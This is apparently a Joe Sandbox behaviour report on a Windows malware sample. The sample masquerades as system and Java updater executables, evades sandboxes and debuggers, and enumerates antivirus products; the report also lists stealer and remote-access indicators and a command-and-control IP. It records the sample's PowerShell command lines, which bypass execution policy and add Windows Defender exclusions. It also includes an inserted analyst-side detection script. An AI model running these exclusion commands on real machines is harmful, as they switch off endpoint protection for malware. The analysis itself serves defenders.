                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe TID: 6204 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176 | Thread sleep time: -12912720851596678s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660 | Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824 | Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 744 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1532 | Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3260 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988 | Thread sleep count: 6259 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4268 | Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2044 | Thread sleep count: 851 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (repeated 2 times)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (repeated 3 times)
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | File Volume queried: C:\ FullSizeInformation (repeated 14 times)
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (repeated 8 times)
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\
                              Source: C:\Users\user\Desktop\x.exe | File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\
                              Source: x.exe | Binary or memory string: vmware
                              Source: x.exe, 00000002.00000002.2476117462.000000001BFA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process information queried: ProcessInformation

                              Anti Debugging

                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Code function: 2_2_00007FFAACCA6E61 CheckRemoteDebuggerPresent,2_2_00007FFAACCA6E61
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process token adjusted: Debug (repeated 2 times)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (repeated 4 times)
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'Jump to behavior
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                              Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                              Source: AutoIt3_x64.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\3582-490\x.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              The volume-information sequence above is logged three more times by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe against the same set of paths (C:\, the System.Data, System.Transactions, Microsoft.Management.Infrastructure.Native, Microsoft.AppV.AppVClientPowerShell, Microsoft.AppV.AppvClientComConsumer, Microsoft.BitLocker.Structures and Microsoft.PowerShell.Commands.Management assemblies, and the Client-Features, GroupPolicy-ClientTools, AppManagement-AppV, SecureStartup-Subsystem and Client-Desktop-Required catalog files). The runs differ only in how many times the Client-Features and Client-Desktop-Required catalog files are queried, which is consistent with the four powershell.exe launches recorded in the process-creation rows above.
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: Yara match | File source: x.exe, type: SAMPLE
                              Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Source: x.exe, 00000002.00000002.2466469178.000000000131D000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2478454246.000000001CAE5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2476117462.000000001BFA6000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2466469178.00000000012C3000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2476117462.000000001C001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
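The WMI query above is the sample's antivirus-product enumeration: root\SecurityCenter2 lists every registered AV product and its state, which is what lets the sample decide whether Windows Defender is the only product present before it touches Defender settings. The PowerShell below is an added example, not part of the Joe Sandbox report and not the sample's code. It runs the same query from the analyst's side and decodes the productState field so the reader sees exactly what the sample learned. The decoding (second hex byte 0x10 or 0x11 means real-time protection on, third byte 0x00 means signatures current) is the widely used community interpretation of an undocumented field, not vendor documentation, and is an assumption here; Get-AvProductState and Get-RegisteredAntivirus are helper names chosen for this example.

```powershell
# Added example, not part of the Joe Sandbox report: the same root\SecurityCenter2 query the
# sample issues, run from the analyst's side, with the undocumented productState decoded.
# The decoding (second hex byte 0x10/0x11 = real-time protection on, third byte 0x00 =
# signatures current) is the common community interpretation; treat it as an assumption.

function Get-AvProductState {
    param([Parameter(Mandatory)][uint32]$ProductState)

    $hex = $ProductState.ToString('x6')       # e.g. 397568 -> '061100'
    [pscustomobject]@{
        Raw         = '0x' + $hex
        RealTimeOn  = ($hex.Substring(2, 2) -in '10', '11')
        Definitions = if ($hex.Substring(4, 2) -eq '00') { 'up to date' } else { 'out of date' }
    }
}

function Get-RegisteredAntivirus {
    try {
        # The namespace exists on Windows client SKUs only; on Windows Server the query
        # fails, which is also what the sample would have seen there.
        $products = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntivirusProduct -ErrorAction Stop
    } catch {
        Write-Warning "root/SecurityCenter2 not available: $($_.Exception.Message)"
        return
    }

    foreach ($p in $products) {
        $state = Get-AvProductState -ProductState $p.productState
        [pscustomobject]@{
            DisplayName  = $p.displayName
            Executable   = $p.pathToSignedProductExe
            RealTimeOn   = $state.RealTimeOn
            Definitions  = $state.Definitions
            ProductState = $state.Raw
        }
    }
}

Get-RegisteredAntivirus | Format-Table -AutoSize
```

The query itself is legitimate and issued by inventory and compliance tools all day, so alerting on it alone produces noise. Its value for this sample is in correlation: a process in a user's Temp directory querying AntivirusProduct shortly before the Defender-related behaviour the report lists (the MsMpeng.exe path string in this section and the Defender exclusion added through PowerShell in the behaviour graph) is a much stronger signal than either event on its own.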

                              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
Source: Yara match | File source: x.exe, type: SAMPLE
Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED

                              Remote Access Functionality

Source: Yara match | File source: x.exe, type: SAMPLE
Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
MITRE ATT&CK Matrix (observed techniques; the digits in parentheses are the matrix's hit badges as extracted)

Reconnaissance, Resource Development, Initial Access: none observed
Execution: Windows Management Instrumentation (12); Scheduled Task/Job (1); PowerShell (1)
Persistence: DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (12)
Privilege Escalation: DLL Side-Loading (1); Windows Service (1); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (12)
Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (11); Software Packing (2); DLL Side-Loading (1); Masquerading (321); Virtualization/Sandbox Evasion (151); Process Injection (12)
Credential Access: Input Capture (111)
Discovery: File and Directory Discovery (2); System Information Discovery (23); Security Software Discovery (541); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Taint Shared Content (1)
Collection: Archive Collected Data (11); Input Capture (111)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Exfiltration, Impact: none observed
Behavior Graph (ID 1465840; sample x.exe; start date 02/07/2024; architecture WINDOWS; score 100)

Top level: DNS ip-api.com. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 20 other signatures.

x.exe (graph node 10)
  dropped: C:\Windows\svchost.com (PE32); C:\Users\user\AppData\Local\Temp\chrome.exe (PE32); C:\Users\user\AppData\Local\Temp\...\x.exe (PE32); 111 other malicious files
  signatures: Creates an undocumented autostart registry key; Drops PE files with a suspicious file extension; Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS); 2 other signatures
  starts: x.exe (node 14)

x.exe (node 14)
  network: ip-api.com 208.95.112.1, ports 49699, 80, TUT-ASUS, United States; 45.141.26.232, ports 49705, 49706, 49707, SPECTRAIPSpectraIPBVNL, Netherlands
  dropped: C:\...\Java Update Checker (64 bit).exe (PE32)
